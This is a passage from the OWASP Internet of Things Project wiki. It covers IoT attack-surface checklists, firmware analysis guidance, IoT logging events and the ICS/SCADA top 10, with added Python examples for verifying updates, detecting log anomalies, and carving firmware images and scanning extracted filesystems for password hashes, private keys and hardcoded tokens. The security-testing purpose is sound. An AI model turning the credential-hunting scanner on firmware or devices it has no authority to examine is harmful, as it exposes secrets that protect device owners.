| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-Wave, XBee, Zigbee, Bluetooth, LoRa)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
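The Update Mechanism, Device Network Services and Device Firmware rows above list what a tester looks for on the receiving end of an update: unsigned images, no payload verification, replay of an old image, and firmware downgrade. The block below is an added example written for this page, not code from the OWASP project or from any vendor, of the checks a device should perform before it flashes anything. The image layout (a header with magic, version, payload length, SHA-256 digest and a 32-byte tag), the key name and the key value are assumptions made for the example. It uses an HMAC under a key provisioned on the device as a stand-in for the signature check, because the Python standard library has no asymmetric primitives; a production device must verify an asymmetric signature (for example Ed25519) so that it holds only a public verification key and a compromised device cannot leak the signing key.<br />
<br />
```python
import hashlib
import hmac
import struct

# Assumed image layout for this example (not any vendor's format):
#   magic(4) | version(4, big-endian) | payload length(4) | sha256(payload)(32) | tag(32)
MAGIC = b"FWUP"
HEADER = struct.Struct(">4sII32s32s")
TAG_LEN = 32

# Constructed for the example: the key the device was provisioned with.
# Stand-in for an asymmetric public key; see the text above.
DEVICE_KEY = bytes(range(32))


def _authenticated_bytes(header: bytes, payload: bytes) -> bytes:
    """Everything the tag covers: the header minus the tag field, plus the payload.
    Covering the header means version and length cannot be swapped on a valid image."""
    return header[:HEADER.size - TAG_LEN] + payload


def build_image(version: int, payload: bytes, key: bytes = DEVICE_KEY) -> bytes:
    """Producer side: wrap a payload in the header and tag it."""
    digest = hashlib.sha256(payload).digest()
    header = HEADER.pack(MAGIC, version, len(payload), digest, b"\x00" * TAG_LEN)
    tag = hmac.new(key, _authenticated_bytes(header, payload), hashlib.sha256).digest()
    return HEADER.pack(MAGIC, version, len(payload), digest, tag) + payload


def verify_image(image: bytes, installed_version: int, key: bytes = DEVICE_KEY):
    """Device side. Returns (ok, reason, payload); flash only when ok is True."""
    if len(image) < HEADER.size:
        return False, "truncated header", None
    header, payload = image[:HEADER.size], image[HEADER.size:]
    magic, version, length, digest, tag = HEADER.unpack(header)
    if magic != MAGIC:
        return False, "bad magic", None
    if len(payload) != length:
        return False, "length mismatch", None
    # 1. Authenticity before anything else: no untrusted field is acted on
    #    until the tag has been verified, and the comparison is constant time.
    expected = hmac.new(key, _authenticated_bytes(header, payload), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        return False, "authentication failed", None
    # 2. Payload digest: redundant once the tag passed, but it is the value a
    #    boot-time integrity check compares against, so confirm it is consistent.
    if not hmac.compare_digest(hashlib.sha256(payload).digest(), digest):
        return False, "payload digest mismatch", None
    # 3. Anti-rollback: a correctly tagged but OLDER image is still refused,
    #    otherwise an attacker replays a version with a known vulnerability.
    if version <= installed_version:
        return False, "rollback: v%d <= installed v%d" % (version, installed_version), None
    return True, "ok", payload


if __name__ == "__main__":
    image = build_image(3, b"firmware v3 payload")
    print(verify_image(image, installed_version=2)[:2])            # (True, 'ok')
    print(verify_image(image, installed_version=3)[:2])            # rollback refused
    tampered = bytearray(image)
    tampered[-1] ^= 0x01
    print(verify_image(bytes(tampered), installed_version=2)[:2])  # authentication failed
```
<br />
The order matters: the tag is checked before the digest or the version is trusted, so a forged header cannot influence any decision, and a correctly signed but older image is still refused, which is the anti-rollback property the "Firmware downgrade possibility" item refers to. Transport encryption (TLS) is a separate control; it hides the image in transit but does not by itself stop a malicious update.<br />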
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to understand the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL/TLS versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
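The "Firmware file analysis", "Firmware extraction" and "File system analysis" rows name the steps without showing them. The block below is an added example written for this page, not part of the OWASP project or of the tools linked above, of two of those steps in plain Python: carving a raw image for known filesystem and container signatures (the same magic values binwalk keys on) together with a block entropy profile that separates compressed or encrypted regions from plain ones, and a firmwalker-style walk over an extracted root filesystem looking for password hashes, private keys, hardcoded credentials and embedded URLs. The signature table, the regular expressions and the sample root filesystem written to a temporary directory are all constructed for the example.<br />
<br />
```python
import math
import os
import re
import tempfile

# Magic values a tester carves for in a raw image (the same ones binwalk keys on).
SIGNATURES = {
    b"\x27\x05\x19\x56": "U-Boot legacy image header",
    b"hsqs": "SquashFS (little-endian)",
    b"sqsh": "SquashFS (big-endian)",
    b"\x45\x3d\xcd\x28": "CramFS (little-endian)",
    b"\x1f\x8b\x08": "gzip stream",
    b"\x7fELF": "ELF binary",
}


def scan_signatures(image: bytes):
    """Return sorted (offset, description) pairs for every known magic found."""
    hits = []
    for magic, name in SIGNATURES.items():
        pos = image.find(magic)
        while pos != -1:
            hits.append((pos, name))
            pos = image.find(magic, pos + 1)
    return sorted(hits)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant block, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def entropy_profile(image: bytes, block: int = 256):
    """Entropy per block. Sustained values near 8.0 are compressed or encrypted
    regions; an image that looks like that everywhere and yields no signature
    hits must be decrypted before any filesystem can be extracted."""
    return [round(shannon_entropy(image[i:i + block]), 2) for i in range(0, len(image), block)]


# firmwalker-style patterns for an extracted root filesystem (constructed; loose on purpose).
FS_PATTERNS = {
    "password hash in passwd/shadow": re.compile(r"^[\w-]+:\$[0-9a-z]+\$[^:]*:", re.M),
    "private key material": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "hardcoded credential": re.compile(r"(?i)(?:passw(?:or)?d|secret|token)\s*[=:]\s*\S+"),
    "embedded URL": re.compile(r"https?://[\w./-]+"),
}


def scan_rootfs(root: str):
    """Walk an extracted filesystem and return sorted (path, label, match) findings."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    text = fh.read(1 << 20).decode("utf-8", "ignore")  # first MiB only
            except OSError:
                continue
            rel = os.path.relpath(path, root)
            for label, pattern in FS_PATTERNS.items():
                for m in pattern.finditer(text):
                    findings.append((rel, label, m.group(0).strip()[:60]))
    return sorted(findings)


def make_sample_rootfs() -> str:
    """Constructed stand-in for an extracted root filesystem; not from any real device."""
    root = tempfile.mkdtemp(prefix="rootfs_")
    files = {
        "etc/passwd": "root:$1$abc$xyz123:0:0:root:/root:/bin/sh\nnobody:x:99:99::/:/bin/false\n",
        "etc/config/cloud.conf": "api_url=https://api.example-vendor.test/v1\napi_token=ABCD1234\n",
        "etc/ssl/device.key": "-----BEGIN RSA PRIVATE KEY-----\nMIIB...\n-----END RSA PRIVATE KEY-----\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
    return root
```
<br />
A profile that sits near 8.0 bits per byte across the whole image with no signature hits usually means the image is encrypted or wholly compressed; extraction then has to wait until the bootloader's unpacking routine has been found. The filesystem patterns are deliberately loose: on a real root filesystem a tester reviews every hit by hand rather than trusting the label.<br />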
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
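The table above names the events but not how a device or its backend would raise them. The block below is an added example written for this page, not code from the OWASP project or from AppSensor, of a stateful detector that reads a constructed device log (one line per event, in the form "epoch type key=value ...") and emits a subset of the listed events: failed and repeated enrollment attempts, traffic from unenrolled and disenrolled devices, multiple failed passwords, a high rate of login attempts, a login with default administrative credentials, and a session whose source address changes. The log format, field names, thresholds and sample lines are all assumptions made for the example.<br />
<br />
```python
import re
from collections import defaultdict, deque

# Constructed log format for the example: "<epoch> <type> key=value ...".
# A real device would emit syslog or JSON; only parse() would need to change.
LINE = re.compile(r"^(?P<ts>\d+) (?P<type>\w+)(?P<kv>(?: \w+=\S+)*)$")

# Constructed sample lines, not captured from any device.
SAMPLE_LOG = """\
100 enroll result=ok device=cam-01
101 enroll result=fail device=cam-99
102 enroll result=fail device=cam-99
110 auth result=fail user=admin src=10.0.0.7
111 auth result=fail user=admin src=10.0.0.7
112 auth result=fail user=admin src=10.0.0.7
115 auth result=ok user=admin src=10.0.0.7 sid=s1 default=yes
121 request sid=s1 src=203.0.113.9
131 traffic device=cam-42 src=10.0.0.22
140 deprovision device=cam-01
141 traffic device=cam-01 src=10.0.0.21
"""


def parse(line):
    m = LINE.match(line.strip())
    if not m:
        return None
    ev = {"ts": int(m["ts"]), "type": m["type"]}
    ev.update(pair.split("=", 1) for pair in m["kv"].split())
    return ev


class Detector:
    # Handlers return (ts, category, event, detail) tuples using the table's categories.
    def __init__(self, fail_threshold=3, rate_threshold=4, window=60, enroll_threshold=2):
        self.fail_threshold, self.rate_threshold = fail_threshold, rate_threshold
        self.window, self.enroll_threshold = window, enroll_threshold
        self.fails = defaultdict(int)         # user -> consecutive failed passwords
        self.attempts = defaultdict(deque)    # src -> timestamps of login attempts
        self.enroll_fails = defaultdict(int)  # device -> failed enrollment attempts
        self.enrolled, self.disenrolled = set(), set()
        self.sessions = {}                    # sid -> src that established the session

    def feed(self, line):
        ev = parse(line)
        handler = getattr(self, "on_" + ev["type"], None) if ev else None
        return handler(ev) if handler else []

    def on_enroll(self, ev):
        dev, ts = ev["device"], ev["ts"]
        if ev.get("result") == "ok":
            self.enrolled.add(dev)
            self.disenrolled.discard(dev)
            return []
        self.enroll_fails[dev] += 1
        out = [(ts, "Ecosystem Membership", "Failed Attempt to Enroll in Ecosystem", dev)]
        if self.enroll_fails[dev] == self.enroll_threshold:
            out.append((ts, "Ecosystem Membership", "Multiple Attempts to Enroll in Ecosystem", dev))
        return out

    def on_deprovision(self, ev):
        self.enrolled.discard(ev["device"])
        self.disenrolled.add(ev["device"])
        return []

    def on_traffic(self, ev):
        dev, ts = ev["device"], ev["ts"]
        if dev in self.disenrolled:
            return [(ts, "Ecosystem Membership", "Traffic Seen from Disenrolled System", dev)]
        if dev not in self.enrolled:
            return [(ts, "Ecosystem Membership", "Traffic Seen from Unenrolled System", dev)]
        return []

    def on_auth(self, ev):
        out, ts, user, src = [], ev["ts"], ev["user"], ev["src"]
        q = self.attempts[src]
        q.append(ts)
        while q[0] <= ts - self.window:       # forget attempts outside the window
            q.popleft()
        if len(q) == self.rate_threshold:     # fires once, when the threshold is crossed
            out.append((ts, "Authentication", "High Rate of Login Attempts", src))
        if ev.get("result") == "ok":
            self.fails[user] = 0
            if "sid" in ev:
                self.sessions[ev["sid"]] = src
            if ev.get("default") == "yes":
                out.append((ts, "Administrative Mode",
                            "Device Accessed Using Default Administrative Credentials", user))
        else:
            self.fails[user] += 1
            if self.fails[user] == self.fail_threshold:
                out.append((ts, "Authentication", "Multiple Failed Passwords", user))
        return out

    def on_request(self, ev):
        origin = self.sessions.get(ev.get("sid"))
        if origin is not None and origin != ev["src"]:
            return [(ev["ts"], "Session", "Source Location Changes During Session",
                     "%s %s -> %s" % (ev["sid"], origin, ev["src"]))]
        return []


def run_detector(lines, **thresholds):
    det = Detector(**thresholds)
    return [alert for line in lines for alert in det.feed(line)]
```
<br />
The thresholds in the constructor (three failed passwords, four attempts in a 60-second window, two enrollment failures) are demo values; the right numbers depend on the device population and on how noisy the deployment is. The useful part of the structure is that every alert carries the event category from the table, so the same output can be fed to an AppSensor-style response policy.<br />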
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Event Logging Project? ==<br />
<br />
The IoT Event Logging Project provides a list of core events that should be logged by any IoT-related system. The project exists because IoT systems in general do not log nearly enough events to serve as input for a solid detection and response program around IoT devices, and for companies that want to build one there are few good resources describing what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501(c)(3) charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington, with offices in Washington, DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer and manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, as well as many lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246178OWASP Internet of Things Project2018-12-19T23:26:50Z<p>Aaron.guzman: /* Collaboration */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
==OWASP Internet of Things (IoT) Project==<br />
<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it and use it commercially, provided that you attribute the work and, if you alter, transform, or build upon it, distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
